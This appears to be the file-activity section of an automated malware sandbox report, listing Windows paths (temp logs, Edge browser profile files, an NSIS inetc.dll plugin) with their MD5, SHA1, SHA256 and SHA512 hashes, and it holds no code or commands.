SHA512 9f9e807db4ccc6bbc6f847eeeb8315d55de9d0d7bd63da96f2d60e232b16c67639b0c2611499a2f7f486d07076db15d381686b082934b5379e78685df048071b

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 cffb8b37fa7cd830670039edcf0d55e2
SHA1 a1ec9d9870a554f88b57eabf92cbf71a2d17f48d
SHA256 634eb13ba4a3df844583eeacdf5b0f11ddd7aef834d3f896c50061be56ee3424
SHA512 de6b91428404febcd433bf7aa10c3510dcee8d86c43e8c8543064b3b9ae66d5cc9d1c3807ee0009272e809ce14e047f79d03cb150197d04983a2a94c0ba2d879

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 b33ae0049d1ed7da9ff5233b0e4c9501
SHA1 e8d30d7ac06aa559dbad9f2a6f1b38016404b60d
SHA256 6bbaf05434379f0739534370f13bdae3417d27d8ae69af870ae2536dcd4448c9
SHA512 71d5d30db17f261b461a47a547924ee76bec488e729eaac9d58dc3b248b4c7a01f517467a44fdccfd5f60771404c6d690b9861c22f062d3c5454a7aaf5ccd631

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4bba0c0346e1ea3ec128f9ae3c7294e9
SHA1 801aecd09e86f5454a8c1051ad824bb0a8bf6fc0
SHA256 3b1793e5f923e44acd2dd49d8c1dbca0893bb88849b46caa3e451b386e07ba85
SHA512 78ffeba4a5aed6f3a1192aaa2909ae82b8e100a3cb2a8f2b10867331a844f295021053540618aaecc58ee019f9106865f6e254911cef0777097a4b78fa33f4bb

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 af87f129b39b12bc8f525cda3cda1e8c
SHA1 e2355edf573bce029ad35e7dfa949c3058d55904
SHA256 29c9cfb4514273be470e5014732edc4098216763b7661be9aa00317d1bfceb81
SHA512 544b00f2d1ac1e80f72fe826e19859840daa82b97dda75425bce2237c722391599573c5b79f74a8b0c91fa90180b1fb745d0266e078167bd25d6d929e6a962a9

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 ee044178436b3793a5ccf969fffce5da
SHA1 5a2ef934599d0f4e96b7b1c54f8efa14f04891b1
SHA256 4e3f802edc07549d03b82b2d44de20a8decb8fa5cddb8a38ada8e3c15307ba9b
SHA512 e1f0da2a6c2c7386b003b2b22e0292c8a39fa6197c0e82e980d827a37b25dfedf8fc2518c2856de5a11974e32813e495fcc274e17327ad7801e9b6e808fcc202

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 71c063f816ac584df00bbcc7e0140a0b
SHA1 dbf7cd8cb491005c0db2febe7e7638238ee8cd93
SHA256 8bd41ddad069457bc796c52badc719b95a796c9a8d7978bf56c4bbd55ac31b50
SHA512 fbc2897b0f9103a121308045fa00c91ddc096a9e78d675b7e4666e70e06893802201ae636e655cd0090556388ddfb2de4a66a2dca8ebf767df61947fff23b3f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1229d3c10a2de2e68acae2dea61d6bb0
SHA1 00748a4c4fb14ce08f125b9c33d06936679e6b76
SHA256 458eab04a163c49f2bbd0a293ca27899a7c4c2466f51f5c36f8cf6f6f481ce50
SHA512 2bd6744120409c990f51b4c7c7805f3c9f219c41e61bc122f9405187c61e99ce094bc9687fb9a2c416be97666540038ba802cd38640f92e85be50c6feb9765cd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 30ace7cb7426e4bf73c6739ea8276e77
SHA1 b24ced6ae64b057efc6dd8e7ed51b506487958ac
SHA256 e9f5c5f7201d1d3609191dc6982586e76ce20c71016122f6d1e831a69fb74dc8
SHA512 0159e21cfa950338e5c8e96fe96033563f01e47febec708c8699cda239f8486bd18dd87980089986a407262f45673e1bf78eda5e113ca572768db9ad8ace004d

C:\Users\Admin\AppData\Local\Temp\nsp1293.tmp\inetc.dll

MD5 d7a3fa6a6c738b4a3c40d5602af20b08
SHA1 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 8ebbe4847f8936dd2a9609989e960b85
SHA1 14e6a240738fa74a064054e513f957eac2d26ecd
SHA256 a1a7b50a7d6996737fec36cefad3825bf7574b48952bb7bb1fc9319b656fcdad
SHA512 e4383e6fb1246a47ecd588eb81f50cdd509f636c76f41be736c8ca8d6f2a13d2b6d7a84048e36ec0cd9c80f71182c004a509899c50c8981f0fcaaaa73702f35c

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 3f997bdc3140d3a2c2db1bb66f89c80b
SHA1 c5944ebfb209aee25781bf65373b65b9061e2cd2
SHA256 8b778c953cbe45cee93b803536ce82aff3b626dbb64e38819e26cf538d1ee076
SHA512 078ea31a776f2fc6c7aa28fe4faf0bbc7643f81984e0e337dc26da3ee8231764cd0c4063c9008601b0c039f77f7f93af87524e53a21fcffa5017cee91fbd240d